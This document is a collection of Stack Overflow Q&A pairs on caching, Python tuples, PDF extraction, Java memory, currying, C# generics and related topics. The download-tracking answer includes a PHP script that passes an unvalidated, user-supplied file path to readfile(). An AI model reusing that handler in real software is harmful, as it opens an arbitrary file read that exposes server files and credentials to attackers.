Recently I have been investigating the possibilities of caching in ASP.NET. I rolled my own "Cache" because I didn't know any better; it looked a bit like this: ``` public class DataManager { private static DataManager s_instance; public static DataManager GetInstance() { if (s_instance == null) { s_instance = new DataManager(); } return s_instance; } private Data[] m_myData; private DateTime m_cacheTime; public Data[] GetData() { TimeSpan span = DateTime.Now.Subtract(m_cacheTime); if (span.TotalSeconds > 10) { // Do SQL to get data m_myData = data; m_cacheTime = DateTime.Now; return m_myData; } else { return m_myData; } } } ``` So the values are stored for a while in a singleton, and when the time expires, the values are renewed. If the time has not expired and the data is requested, the stored values in the field are returned. What are the benefits of using the real method (<http://msdn.microsoft.com/en-us/library/aa478965.aspx>) instead of this?
I think the maxim "let the computer do it; it's smarter than you" applies here. Just like memory management and other complicated things, the computer is a lot more informed about what it's doing than you are, and consequently able to get more performance out of it than you can. Microsoft has had a team of engineers working on it, and they've probably managed to squeeze much more performance out of the system than you could on your own. It's also likely that ASP.NET's built-in caching operates at a different level (one inaccessible to your application), making it much faster.
The ASP.NET caching mechanism has been around for a while, so it's stable and well understood, and there are lots of resources out there to help you make the most of it. Rolling your own might still be the right solution, depending on your requirements. The hard part about caching is choosing what is safe to cache, and when. For applications in which data changes frequently, caching can introduce some hard-to-troubleshoot bugs, so be careful.
ASP.NET Caching
[ "", "asp.net", "sql", "caching", "" ]
I am learning Python for a class now, and we just covered tuples as one of the data types. I read the Wikipedia page on it, but I could not figure out where such a data type would be useful in practice. Can I have some examples, perhaps in Python, where an immutable set of numbers would be needed? How is this different from a list?
* Tuples are used whenever you want to return multiple results from a function. * Since they're immutable, they can be used as keys for a dictionary (lists can't).
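A minimal Python sketch of both points above (function and variable names are mine, chosen for illustration):

```python
# 1. Returning multiple results from a function as a tuple.
def min_max(values):
    """Return the smallest and largest element as one tuple."""
    return min(values), max(values)

lo, hi = min_max([3, 1, 4, 1, 5])  # tuple unpacking at the call site

# 2. Tuples are immutable, hence hashable, hence valid dict keys.
grid = {}
grid[(0, 0)] = "origin"
grid[(1, 2)] = "point"
# grid[[0, 0]] = "bad"  # a list key would raise TypeError: unhashable type
```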
Tuples make good dictionary keys when you need to combine more than one piece of data into your key and don't feel like making a class for it. ``` a = {} a[(1,2,"bob")] = "hello!" a[("Hello","en-US")] = "Hi There!" ``` I've used this feature primarily to create a dictionary with keys that are coordinates of the vertices of a mesh. However, in my particular case, the exact comparison of the floats involved worked fine, which might not always be true for your purposes (in which case I'd probably convert the incoming floats to some kind of fixed-point integer).
What is a tuple useful for?
[ "", "python", "tuples", "" ]
Using ASP.NET MVC there are situations (such as form submission) that may require a `RedirectToAction`. One such situation is when you encounter validation errors after a form submission and need to redirect back to the form, but would like the URL to reflect the URL of the form, not the action page it submits to. As I require the form to contain the originally `POST`ed data, for user convenience, as well as validation purposes, how can I pass the data through the `RedirectToAction()`? If I use the viewData parameter, my `POST` parameters will be changed to `GET` parameters.
The solution is to use the TempData property to store the desired Request components. For instance: ``` public ActionResult Send() { TempData["form"] = Request.Form; return this.RedirectToAction(a => a.Form()); } ``` Then in your "Form" action you can go: ``` public ActionResult Form() { /* Declare viewData etc. */ if (TempData["form"] != null) { /* Cast TempData["form"] to System.Collections.Specialized.NameValueCollection and use it */ } return View("Form", viewData); } ```
Keep in mind that TempData stores the form collection in session. If you don't like that behavior, you can implement the new ITempDataProvider interface and use some other mechanism for storing temp data. I wouldn't do that unless you know for a fact (via measurement and profiling) that the use of Session state is hurting you.
How to RedirectToAction in ASP.NET MVC without losing request data
[ "", "c#", "asp.net-mvc", "" ]
Is there any Python module to convert PDF files into text? I tried [one piece of code](http://code.activestate.com/recipes/511465/) found on ActiveState which uses pypdf, but the generated text had no spaces between words and was of no use.
Try [PDFMiner](http://www.unixuser.org/~euske/python/pdfminer/index.html). It can extract text from PDF files as HTML, SGML or "Tagged PDF" format. The Tagged PDF format seems to be the cleanest, and stripping out the XML tags leaves just the bare text. A Python 3 version is available under: * <https://github.com/pdfminer/pdfminer.six>
The [PDFMiner](http://www.unixuser.org/~euske/python/pdfminer/index.html) package has changed since [codeape](https://stackoverflow.com/users/3571/codeape) posted. **EDIT (again):** PDFMiner has been updated again in version `20100213` You can check the version you have installed with the following: ``` >>> import pdfminer >>> pdfminer.__version__ '20100213' ``` Here's the updated version (with comments on what I changed/added): ``` def pdf_to_csv(filename): from cStringIO import StringIO #<-- added so you can copy/paste this to try it from pdfminer.converter import LTTextItem, TextConverter from pdfminer.pdfparser import PDFDocument, PDFParser from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter class CsvConverter(TextConverter): def __init__(self, *args, **kwargs): TextConverter.__init__(self, *args, **kwargs) def end_page(self, i): from collections import defaultdict lines = defaultdict(lambda : {}) for child in self.cur_item.objs: if isinstance(child, LTTextItem): (_,_,x,y) = child.bbox #<-- changed line = lines[int(-y)] line[x] = child.text.encode(self.codec) #<-- changed for y in sorted(lines.keys()): line = lines[y] self.outfp.write(";".join(line[x] for x in sorted(line.keys()))) self.outfp.write("\n") # ... 
# the following part of the code is a remix of the # convert() function in the pdfminer/tools/pdf2text module rsrc = PDFResourceManager() outfp = StringIO() device = CsvConverter(rsrc, outfp, codec="utf-8") #<-- changed # because my test documents are utf-8 (note: utf-8 is the default codec) doc = PDFDocument() fp = open(filename, 'rb') parser = PDFParser(fp) #<-- changed parser.set_document(doc) #<-- added doc.set_parser(parser) #<-- added doc.initialize('') interpreter = PDFPageInterpreter(rsrc, device) for i, page in enumerate(doc.get_pages()): outfp.write("START PAGE %d\n" % i) interpreter.process_page(page) outfp.write("END PAGE %d\n" % i) device.close() fp.close() return outfp.getvalue() ``` **Edit (yet again):** Here is an update for the latest version in [pypi](http://pypi.python.org/pypi/pdfminer/), `20100619p1`. In short, I replaced `LTTextItem` with `LTChar` and passed an instance of `LAParams` to the `CsvConverter` constructor. ``` def pdf_to_csv(filename): from cStringIO import StringIO from pdfminer.converter import LTChar, TextConverter #<-- changed from pdfminer.layout import LAParams from pdfminer.pdfparser import PDFDocument, PDFParser from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter class CsvConverter(TextConverter): def __init__(self, *args, **kwargs): TextConverter.__init__(self, *args, **kwargs) def end_page(self, i): from collections import defaultdict lines = defaultdict(lambda : {}) for child in self.cur_item.objs: if isinstance(child, LTChar): #<-- changed (_,_,x,y) = child.bbox line = lines[int(-y)] line[x] = child.text.encode(self.codec) for y in sorted(lines.keys()): line = lines[y] self.outfp.write(";".join(line[x] for x in sorted(line.keys()))) self.outfp.write("\n") # ... 
# the following part of the code is a remix of the # convert() function in the pdfminer/tools/pdf2text module rsrc = PDFResourceManager() outfp = StringIO() device = CsvConverter(rsrc, outfp, codec="utf-8", laparams=LAParams()) #<-- changed # because my test documents are utf-8 (note: utf-8 is the default codec) doc = PDFDocument() fp = open(filename, 'rb') parser = PDFParser(fp) parser.set_document(doc) doc.set_parser(parser) doc.initialize('') interpreter = PDFPageInterpreter(rsrc, device) for i, page in enumerate(doc.get_pages()): outfp.write("START PAGE %d\n" % i) if page is not None: interpreter.process_page(page) outfp.write("END PAGE %d\n" % i) device.close() fp.close() return outfp.getvalue() ``` **EDIT (one more time):** Updated for version `20110515` (thanks to Oeufcoque Penteano!): ``` def pdf_to_csv(filename): from cStringIO import StringIO from pdfminer.converter import LTChar, TextConverter from pdfminer.layout import LAParams from pdfminer.pdfparser import PDFDocument, PDFParser from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter class CsvConverter(TextConverter): def __init__(self, *args, **kwargs): TextConverter.__init__(self, *args, **kwargs) def end_page(self, i): from collections import defaultdict lines = defaultdict(lambda : {}) for child in self.cur_item._objs: #<-- changed if isinstance(child, LTChar): (_,_,x,y) = child.bbox line = lines[int(-y)] line[x] = child._text.encode(self.codec) #<-- changed for y in sorted(lines.keys()): line = lines[y] self.outfp.write(";".join(line[x] for x in sorted(line.keys()))) self.outfp.write("\n") # ... 
# the following part of the code is a remix of the # convert() function in the pdfminer/tools/pdf2text module rsrc = PDFResourceManager() outfp = StringIO() device = CsvConverter(rsrc, outfp, codec="utf-8", laparams=LAParams()) # because my test documents are utf-8 (note: utf-8 is the default codec) doc = PDFDocument() fp = open(filename, 'rb') parser = PDFParser(fp) parser.set_document(doc) doc.set_parser(parser) doc.initialize('') interpreter = PDFPageInterpreter(rsrc, device) for i, page in enumerate(doc.get_pages()): outfp.write("START PAGE %d\n" % i) if page is not None: interpreter.process_page(page) outfp.write("END PAGE %d\n" % i) device.close() fp.close() return outfp.getvalue() ```
Python module for converting PDF to text
[ "", "python", "pdf", "text-extraction", "pdf-scraping", "" ]
I am writing a client-side **Swing** application (graphical font designer) on **Java 5**. Recently, I have been running into a `java.lang.OutOfMemoryError: Java heap space` error because I am not being conservative on memory usage. The user can open an unlimited number of files, and the program keeps the opened objects in memory. After some quick research I found [Ergonomics in the 5.0 Java Virtual Machine](http://java.sun.com/docs/hotspot/gc5.0/ergo5.html) and others saying that on Windows machines the JVM defaults the max heap size to `64MB`. Given this situation, how should I deal with this constraint? I could increase the **max heap size** using a **command line** option to java, but that would require figuring out the available RAM and writing some launching program or script. Besides, increasing to some **finite** max does not **ultimately** get rid of the issue. I could rewrite some of my code to persist objects to the file system frequently (using a database is the same thing) to free up the memory. It could work, but it's probably a lot of work too. If you could point me to details of the above ideas or some alternatives, like **automatic virtual memory, extending heap size dynamically**, that would be great.
Ultimately you always have a finite maximum heap to use, no matter what platform you are running on. On 32-bit Windows this is around `2GB` (not specifically heap but total amount of memory per process). It just happens that Java chooses to make the default smaller (presumably so that the programmer can't create programs that have runaway memory allocation without running into this problem and having to examine exactly what they are doing). Given this, there are several approaches you could take to either determine what amount of memory you need or to reduce the amount of memory you are using. One common mistake with garbage collected languages such as Java or C# is to keep around references to objects that you are **no longer** using, or to allocate many objects when you could **reuse** them instead. As long as objects have a reference to them they will continue to use heap space, as the garbage collector will not delete them. In this case you can use a Java memory profiler to determine what methods in your program are allocating large numbers of objects and then determine if there is a way to make sure they are no longer referenced, or to not allocate them in the first place. One option which I have used in the past is "JMP" <http://www.khelekore.org/jmp/>. If you determine that you are allocating these objects for a reason and you need to keep around references (depending on what you are doing this might be the case), you will just need to increase the max heap size when you start the program. However, once you do the memory profiling and understand how your objects are getting allocated you should have a better idea about how much memory you need. In general if you can't guarantee that your program will run in some finite amount of memory (perhaps depending on input size) you will always run into this problem. Only after exhausting all of this will you need to look into caching objects out to disk etc.
At this point you should have a very good reason to say "I need X GB of memory" for something, and be unable to work around it by improving your algorithms or memory allocation patterns. Generally this will only be the case for algorithms operating on large datasets (like a database or some scientific analysis program), and then techniques like caching and memory-mapped IO become useful.
Run Java with the command-line option `-Xmx`, which sets the *maximum* size of the heap. [See here for details](http://docs.oracle.com/javase/7/docs/technotes/tools/windows/java.html#nonstandard).
How to deal with "java.lang.OutOfMemoryError: Java heap space" error?
[ "", "java", "jvm", "out-of-memory", "heap-memory", "" ]
I have my Wordpress install and MediaWiki [sharing the same login information](https://stackoverflow.com/questions/33745 "Thanks ceejayoz"). Unfortunately, users need to log into both separately, but at least they use the same credentials. What I would like to do is cause a successful login on the Wordpress blog to also cause a login for MediaWiki (ideally both directions). There are two ways this could happen: 1. Logging in causes a login on the other application (writes the cookie and creates the session in the DB) 2. Accessing an application checks for the cookie of the other and then automatically logs in. Since the usernames are shared it seems like the latter should be pretty easy to do. Any tips would be great.
They both support [OpenId](http://openid.net/) now. * [MediaWiki's extension](http://www.mediawiki.org/wiki/Extension:OpenID) * [WordPress's plugin](http://wordpress.org/extend/plugins/openid/) There are probably other options for using OpenId, but I think that is the best solution available.
The primary problem you are going to run into is that you'll have two login forms, and two logout methods. What you need to do is pick one of the login forms as the default, and redirect the other one over to it. I've been able to [successfully integrate](http://www.howtogeek.com) bbPress + MediaWiki + WordPress + WordPress MU, but I wrote a lot of custom code to do it. I'm using the bbPress login page as the default (and .htaccess rewrite to /login/), and then I created my own MediaWiki authentication plugin (which looks a lot like the one you are using), except my plugin checks the WordPress/bbPress cookie for the login information and automatically logs the user in. I created a customized /logout/ link that runs the bbPress logout, and also kills the MediaWiki cookies at the same time. Then the last step was to redirect all of the other logout / login links for bbpress, mediawiki, etc, over to my consolidated one. I used .htaccess rewrites for this rather than mess with core code. Still a work in progress, but it works fairly well.
Wordpress MediaWiki Cookie Integration
[ "", "php", "wordpress", "lamp", "mediawiki", "" ]
If I create a class like so: ``` // B.h #ifndef _B_H_ #define _B_H_ class B { private: int x; int y; }; #endif // _B_H_ ``` and use it like this: ``` // main.cpp #include <iostream> #include <vector> class B; // Forward declaration. class A { public: A() { std::cout << v.size() << std::endl; } private: std::vector<B> v; }; int main() { A a; } ``` The compiler fails when compiling `main.cpp`. Now the solution I know is to `#include "B.h"`, but I'm curious as to why it fails. Neither `g++` or `cl`'s error messages were very enlightening in this matter.
The compiler needs to know how big "B" is before it can generate the appropriate layout information. If instead, you said `std::vector<B*>`, then the compiler wouldn't need to know how big B is because it knows how big a pointer is.
In fact your example would build if A's constructor were implemented in a compilation unit that knows the type of B. A std::vector instance has a fixed size, no matter what T is, since it contains, as others said before, only a pointer to T. But the vector's constructor depends on the concrete type. Your example doesn't compile because A() tries to call the vector's ctor, which can't be generated without knowing B. Here's what would work: A's declaration: ``` // A.h #include <vector> class B; // Forward declaration. class A { public: A(); // only declare, don't implement here private: std::vector<B> v; }; ``` A's implementation: ``` // A.cpp #include <iostream> #include "A.h" #include "B.h" A::A() // this implicitly calls vector<B>'s constructor { std::cout << v.size() << std::endl; } ``` Now a user of A needs to know only A, not B: ``` // main.cpp #include "A.h" int main() { A a; // compiles OK } ```
Why can't a forward declaration be used for a std::vector?
[ "", "c++", "stl", "" ]
Is there a function like `document.getElementById("FirstDiv").clear()`?
To answer the original question - there are various ways to do this, but the following would be the simplest. If you already have a handle to the child node that you want to remove, i.e. you have a JavaScript variable that holds a reference to it: ``` myChildNode.parentNode.removeChild(myChildNode); ``` Obviously, if you are not using one of the numerous libraries that already do this, you would want to create a function to abstract this out: ``` function removeElement(node) { node.parentNode.removeChild(node); } ``` --- EDIT: As has been mentioned by others: if you have any event handlers wired up to the node you are removing, you will want to make sure you disconnect those before the last reference to the node being removed goes out of scope, lest poor implementations of the JavaScript interpreter leak memory.
If you want to clear the div and remove all child nodes, you could put: ``` var mydiv = document.getElementById('FirstDiv'); while(mydiv.firstChild) { mydiv.removeChild(mydiv.firstChild); } ```
How can I remove a child node in HTML using JavaScript?
[ "", "javascript", "html", "dom", "" ]
We've just started using LINQ to SQL at work for our DAL, and we haven't really come up with a standard for our caching model. Previously we had been using a base 'DAL' class that implemented a cache manager property that all our DAL classes inherited from, but now we don't have that. I'm wondering if anyone has come up with a 'standard' approach to caching LINQ to SQL results? We're working in a web environment (IIS), if that makes a difference. I know this may well end up being a [subjective](https://stackoverflow.com/questions/tagged/subjective) question, but I still think the info would be valuable. **EDIT:** To clarify, I'm not talking about caching an individual result; I'm after more of an architectural solution, as in how do you set up caching so that all your LINQ methods use the same caching architecture.
A quick answer: Use the Repository pattern (see Domain Driven Design by Evans) to fetch your entities. Each repository will cache the things it will hold, ideally by letting each instance of the repository access a singleton cache (each thread/request will instantiate a new repository but there can be only one cache). The above answer works on one machine only. To be able to use this on many machines, use [memcached](http://memcached.org/) as your caching solution. Good luck!
My [LINQ query result cache](http://petemontgomery.wordpress.com/2008/08/07/caching-the-results-of-linq-queries/) is probably just what you're looking for. ``` var q = from c in context.Customers where c.City == "London" select new { c.Name, c.Phone }; var result = q.Take(10).FromCache(); ``` Pete.
How do you implement caching in Linq to SQL?
[ "", ".net", "sql", "linq-to-sql", "iis", "caching", "" ]
I have a website that plays mp3s in a flash player. If a user clicks 'play' the flash player automatically downloads an mp3 and starts playing it. Is there an easy way to track how many times a particular song clip (or any binary file) has been downloaded? --- > Is the play link a link to the actual > mp3 file or to some javascript code > that pops up a player? > > If the latter, you can easily add your > own logging code in there to track the > number of hits to it. > > If the former, you'll need something > that can track the web server log > itself and make that distinction. My > hosting plan comes with Webalizer, > which does this nicely. It's JavaScript code, so that answers that. However, it would be nice to know how to track downloads using the other method (without switching hosts).
The funny thing is that I wrote a PHP media gallery for all my music two days ago. I had a similar problem. I'm using <http://musicplayer.sourceforge.net/> for the player. And the playlist is built via PHP. All music requests go to a script called xfer.php?file=WHATEVER ``` $filename = base64_url_decode($_REQUEST['file']); header("Cache-Control: public"); header('Content-disposition: attachment; filename='.basename($filename)); header("Content-Transfer-Encoding: binary"); header('Content-Length: '. filesize($filename)); // Put your file counting code here, either a db or static files // readfile($filename); // and send the file to the user function base64_url_decode($input) { return base64_decode(strtr($input, '-_,', '+/=')); } ``` And when you build file links, use something like: ``` function base64_url_encode($input) { return strtr(base64_encode($input), '+/=', '-_,'); } ``` <http://us.php.net/manual/en/function.base64-encode.php> If you are using some JavaScript or a flash player (JW player for example) that requires the actual link of an mp3 file or whatever, you can append the text "&type=.mp3" so the final link becomes something like: "www.example.com/xfer.php?file=34842ffjfjxfh&type=.mp3". That way it looks like it ends with an mp3 extension without affecting the file link.
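The `strtr` trick above (swapping `+/=` for URL-safe characters) has a standard-library analogue in Python, sketched here for comparison. Note one difference: Python's urlsafe variant maps only `+/` to `-_` and keeps the `=` padding, whereas the PHP helper above also translates `=` to `,`.

```python
import base64

def base64_url_encode(data: bytes) -> str:
    """URL-safe base64: '+' -> '-', '/' -> '_' (padding '=' is kept)."""
    return base64.urlsafe_b64encode(data).decode("ascii")

def base64_url_decode(text: str) -> bytes:
    """Inverse of base64_url_encode."""
    return base64.urlsafe_b64decode(text.encode("ascii"))
```

A file path round-trips cleanly through a query string this way, since the token never contains `+` or `/`.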
Use your httpd log files. Install <http://awstats.sourceforge.net/>
How do I track file downloads
[ "", "php", "apache", "logging", "download", "analytics", "" ]
I was just wondering if there is an elegant way to set the maximum CPU load for a particular thread doing intensive calculations. Right now I have located the most time-consuming loop in the thread (it does only compression) and use `GetTickCount()` and `Sleep()` with hardcoded values. It makes sure that the loop continues for a certain period and then sleeps for a certain minimum time. It more or less does the job, i.e. guarantees that the thread will not use more than 50% of CPU. However, behavior is dependent on the number of CPU cores (huge disadvantage) and simply ugly (smaller disadvantage). Any ideas?
I am not aware of any API to get the OS's scheduler to do what you want (even if your thread is idle-priority, if there are no higher-priority ready threads, yours will run). However, I think you can improvise a fairly elegant throttling function based on what you are already doing. Essentially (I don't have a Windows dev machine handy): Pick a default amount of time the thread will sleep each iteration. Then, on each iteration (or on every nth iteration, so that the throttling function doesn't itself become a significant CPU load), 1. Compute the amount of CPU time your thread used since the last time your throttling function was called (I'll call this dCPU). You can use the [GetThreadTimes()](http://msdn.microsoft.com/en-us/library/ms683237.aspx) API to get the amount of time your thread has been executing. 2. Compute the amount of real time elapsed since the last time your throttling function was called (I'll call this dClock). 3. dCPU / dClock is the percent CPU usage (of one CPU). If it is higher than you want, increase your sleep time; if lower, decrease it. 4. Have your thread sleep for the computed time. Depending on how your watchdog computes CPU usage, you might want to use [GetProcessAffinityMask()](http://msdn.microsoft.com/en-us/library/ms683213(VS.85).aspx) to find out how many CPUs the system has. dCPU / (dClock \* CPUs) is the percentage of total CPU time available. You will still have to pick some magic numbers for the initial sleep time and the increment/decrement amount, but I think this algorithm could be tuned to keep a thread running at fairly close to a determined percent of CPU.
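The numbered steps above are not Windows-specific. Here is a rough Python sketch of the same feedback loop, using `time.process_time()` (CPU time) and `time.monotonic()` (wall clock) in place of `GetThreadTimes()`; the target, initial sleep, and step size are made-up tuning values, exactly the "magic numbers" mentioned above.

```python
import time

def adjust_sleep(sleep_s, d_cpu, d_clock, target=0.5, step=0.005):
    """Step 3: compare measured CPU usage to the target and nudge the
    per-iteration sleep time up or down (step size is a made-up tunable)."""
    usage = d_cpu / d_clock if d_clock > 0 else 0.0
    if usage > target:
        sleep_s += step
    elif usage < target:
        sleep_s = max(0.0, sleep_s - step)
    return sleep_s

def throttled_loop(work, iterations, target=0.5):
    sleep_s = 0.01  # initial guess ("magic number")
    last_cpu, last_clock = time.process_time(), time.monotonic()
    for _ in range(iterations):
        work()  # the CPU-intensive body, e.g. a compression step
        d_cpu = time.process_time() - last_cpu      # step 1
        d_clock = time.monotonic() - last_clock     # step 2
        sleep_s = adjust_sleep(sleep_s, d_cpu, d_clock, target)  # step 3
        last_cpu, last_clock = time.process_time(), time.monotonic()
        time.sleep(sleep_s)                          # step 4
```

Note `process_time()` measures the whole process rather than one thread, so this sketch matches the single-threaded case; a per-thread clock would be needed for the general one.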
On Linux, you can change the scheduling priority of a thread with `nice()`.
CPU throttling in C++
[ "", "c++", "performance", "cpu", "throttling", "" ]
In many places, `(1,2,3)` (a tuple) and `[1,2,3]` (a list) can be used interchangeably. When should I use one or the other, and why?
From the [Python FAQ](http://www.python.org/doc/faq/general/#why-are-there-separate-tuple-and-list-data-types): > Lists and tuples, while similar in many respects, are generally used in fundamentally different ways. Tuples can be thought of as being similar to Pascal records or C structs; they're small collections of related data which may be of different types which are operated on as a group. For example, a Cartesian coordinate is appropriately represented as a tuple of two or three numbers. > > Lists, on the other hand, are more like arrays in other languages. They tend to hold a varying number of objects all of which have the same type and which are operated on one-by-one. Generally by convention you wouldn't choose a list or a tuple just based on its (im)mutability. You would choose a tuple for small collections of completely different pieces of data in which a full-blown class would be too heavyweight, and a list for collections of any reasonable size where you have a homogeneous set of data.
The list `[1,2,3]` is dynamic and flexible but that flexibility comes at a speed cost. The tuple `(1,2,3)` is fixed (immutable) and therefore faster.
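A short sketch of the convention described above, with illustrative names:

```python
# Heterogeneous, fixed-structure record -> tuple.
point = (2.0, 3.5)             # always exactly x and y

# Homogeneous, variable-length collection -> list.
readings = [0.1, 0.4, 0.2]     # same-typed items, operated on one by one
readings.append(0.9)           # lists grow in place

# Immutability also makes the tuple usable as a dict key.
labels = {point: "sensor A"}
```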
Python: what is the difference between (1,2,3) and [1,2,3], and when should I use each?
[ "", "python", "list", "tuples", "" ]
I've seen references to curried functions in several articles and blogs but I can't find a good explanation (or at least one that makes sense!)
Currying is when you break down a function that takes multiple arguments into a series of functions that each take only one argument. Here's an example in JavaScript: ``` function add (a, b) { return a + b; } add(3, 4); // returns 7 ``` This is a function that takes two arguments, a and b, and returns their sum. We will now curry this function: ``` function add (a) { return function (b) { return a + b; } } ``` This is a function that takes one argument, `a`, and returns a function that takes another argument, `b`, and that function returns their sum. ``` add(3)(4); // returns 7 var add3 = add(3); // returns a function add3(4); // returns 7 ``` * The first statement returns 7, like the `add(3, 4)` statement. * The second statement defines a new function called `add3` that will add 3 to its argument. (This is what some may call a closure.) * The third statement uses the `add3` operation to add 3 to 4, again producing 7 as a result.
In an algebra of functions, dealing with functions that take multiple arguments (or equivalent one argument that's an N-tuple) is somewhat inelegant -- but, as Moses Schönfinkel (and, independently, Haskell Curry) proved, it's not needed: all you need are functions that take one argument. So how do you deal with something you'd naturally express as, say, `f(x,y)`? Well, you take that as equivalent to `f(x)(y)` -- `f(x)`, call it `g`, is a function, and you apply that function to `y`. In other words, you only have functions that take one argument -- but some of those functions return other functions (which ALSO take one argument;-). As usual, [wikipedia](http://en.wikipedia.org/wiki/Currying) has a nice summary entry about this, with many useful pointers (probably including ones regarding your favorite languages;-) as well as slightly more rigorous mathematical treatment.
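The `f(x,y)` to `f(x)(y)` transformation described above reads naturally in Python too; `g` here is the intermediate function the answer mentions:

```python
def f(x):
    def g(y):        # g closes over x
        return x + y
    return g

add_one = f(1)       # partially applied: a function still awaiting y
```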
What is 'Currying'?
[ "", "javascript", "functional-programming", "terminology", "definition", "currying", "" ]
It seems that a `List<string>` object cannot be stored in a `List<object>` variable in C#, and can't even be explicitly cast that way. ``` List<string> sl = new List<string>(); List<object> ol; ol = sl; ``` results in Cannot implicitly convert type `System.Collections.Generic.List<string>` to `System.Collections.Generic.List<object>` And then... ``` List<string> sl = new List<string>(); List<object> ol; ol = (List<object>)sl; ``` results in Cannot convert type `System.Collections.Generic.List<string>` to `System.Collections.Generic.List<object>` Of course, you can do it by pulling everything out of the string list and putting it back in one at a time, but it is a rather convoluted solution.
Think of it this way, if you were to do such a cast, and then add an object of type Foo to the list, the list of strings is no longer consistent. If you were to iterate the first reference, you would get a class cast exception because once you hit the Foo instance, the Foo could not be converted to string! As a side note, I think it would be more significant whether or not you can do the reverse cast: ``` List<object> ol = new List<object>(); List<string> sl; sl = (List<string>)ol; ``` I haven't used C# in a while, so I don't know if that is legal, but that sort of cast is actually (potentially) useful. In this case, you are going from a more general class (object) to a more specific class (string) that extends from the general one. In this way, if you add to the list of strings, you are not violating the list of objects. Does anybody know or can test if such a cast is legal in C#?
If you're using .NET 3.5, have a look at the Enumerable.Cast method. It's an extension method, so you can call it directly on the List. ``` List<string> sl = new List<string>(); IEnumerable<object> ol; ol = sl.Cast<object>(); ``` It's not exactly what you asked for, but should do the trick. Edit: As noted by Zooba, you can then call ol.ToList() to get a `List<object>`.
In C#, why can't a List<string> object be stored in a List<object> variable
[ "", "c#", ".net", "generics", "covariance", "type-safety", "" ]
I have a "Status" class in C#, used like this: ``` Status MyFunction() { if(...) // something bad return new Status(false, "Something went wrong") else return new Status(true, "OK"); } ``` You get the idea. All callers of MyFunction *should* check the returned Status: ``` Status myStatus = MyFunction(); if ( ! myStatus.IsOK() ) // handle it, show a message,... ``` Lazy callers however can ignore the Status. ``` MyFunction(); // call function and ignore returned Status ``` or ``` { Status myStatus = MyFunction(); } // lose all references to myStatus, without calling IsOK() on it ``` Is it possible to make this impossible? e.g. an throw exception **In general**: is it possible to write a C# class on which you *have* to call a certain function? In the C++ version of the Status class, I can write a test on some private bool bIsChecked in the *destructor* and ring some bells when someone doesn't check this instance. What is the equivalent option in C#? I read somewhere that "You don't want a destructor in your C# class" Is the Dispose method of the IDisposable interface an option? In this case there are no unmanaged resources to free. Additionally, it is not determined *when* the GC will dispose the object. When it eventually gets disposed, is it still possible to know where and when you ignored that specific Status instance? The "using" keyword does help, but again, it is not *required* for lazy callers.
I am fairly certain you can't get the effect you want as a return value from a method. C# just can't do some of the things C++ can. However, a somewhat ugly way to get a similar effect is the following: ``` using System; public class Example { public class Toy { private bool inCupboard = false; public void Play() { Console.WriteLine("Playing."); } public void PutAway() { inCupboard = true; } public bool IsInCupboard { get { return inCupboard; } } } public delegate void ToyUseCallback(Toy toy); public class Parent { public static void RequestToy(ToyUseCallback callback) { Toy toy = new Toy(); callback(toy); if (!toy.IsInCupboard) { throw new Exception("You didn't put your toy in the cupboard!"); } } } public class Child { public static void Play() { Parent.RequestToy(delegate(Toy toy) { toy.Play(); // Oops! Forgot to put the toy away! }); } } public static void Main() { Child.Play(); Console.ReadLine(); } } ``` In the very simple example, you get an instance of Toy by calling Parent.RequestToy, *and passing it a delegate*. Instead of returning the toy, the method immediately calls the delegate with the toy, which must call PutAway before it returns, or the RequestToy method will throw an exception. I make no claims as to the wisdom of using this technique -- indeed in all "something went wrong" examples an exception is almost certainly a better bet -- but I think it comes about as close as you can get to your original request.
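The callback-enforcement idea in that answer can also be sketched in Python, where a context manager plays the role the C++ destructor plays. This is an illustrative sketch only; the `Status` API below is hypothetical and not from the question's codebase.

```python
class UncheckedStatusError(Exception):
    """Raised when a Status leaves its 'with' block without being checked."""


class Status:
    def __init__(self, ok, message):
        self._ok = ok
        self.message = message
        self._checked = False

    def is_ok(self):
        # Record that the caller actually looked at the result.
        self._checked = True
        return self._ok

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        # Fail loudly if the caller never inspected the status.
        if exc_type is None and not self._checked:
            raise UncheckedStatusError("Status was never checked")
        return False


def my_function():
    # Hypothetical function returning a Status, as in the question.
    return Status(True, "OK")


# A diligent caller:
with my_function() as status:
    if not status.is_ok():
        print(status.message)
```

Unlike a finalizer, the check runs deterministically when the `with` block exits, which sidesteps the "when does the GC dispose it" concern for this particular pattern.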
I know this doesn't answer your question directly, but if "something went wrong" within your function (unexpected circumstances), I think you should be throwing an exception rather than using status return codes. Then leave it up to the caller to catch and handle this exception if it can, or allow it to propagate if the caller is unable to handle the situation. The exception thrown could be of a custom type if this is appropriate. For *expected* alternative results, I agree with @Jon Limjap's suggestion. I'm fond of a bool return type and prefixing the method name with "Try", a la: ``` bool TryMyFunction(out Status status) { } ```
Enforcing required function call
[ "c#", "garbage-collection", "dispose", "destructor" ]
I am currently working on a project with specific requirements. A brief overview of these is as follows: * Data is retrieved from external webservices * Data is stored in SQL 2005 * Data is manipulated via a web GUI * The windows service that communicates with the web services has no coupling with our internal web UI, except via the database. * Communication with the web services needs to be both time-based, and triggered via user intervention on the web UI. The current (pre-pre-production) model for web service communication triggering is via a database table that stores trigger requests generated from the manual intervention. I do not really want to have multiple trigger mechanisms, but would like to be able to populate the database table with triggers based upon the time of the call. As I see it there are two ways to accomplish this. 1) Adapt the trigger table to store two extra parameters. One being "Is this time-based or manually added?" and a nullable field to store the timing details (exact format to be determined). If it is a manually created trigger, mark it as processed when the trigger has been fired, but not if it is a timed trigger. *or* 2) Create a second windows service that creates the triggers on-the-fly at timed intervals. The second option seems like a fudge to me, but the management of option 1 could easily turn into a programming nightmare (how do you know if the last poll of the table returned the event that needs to fire, and how do you then stop it re-triggering on the next poll?) I'd appreciate it if anyone could spare a few minutes to help me decide which route (one of these two, or possibly a third, unlisted one) to take.
Why not use a SQL Job instead of the Windows Service? You can encapsulate all of your db "trigger" code in Stored Procedures. Then your UI and SQL Job can call the same Stored Procedures and create the triggers the same way, whether it's manual or at a timed interval.
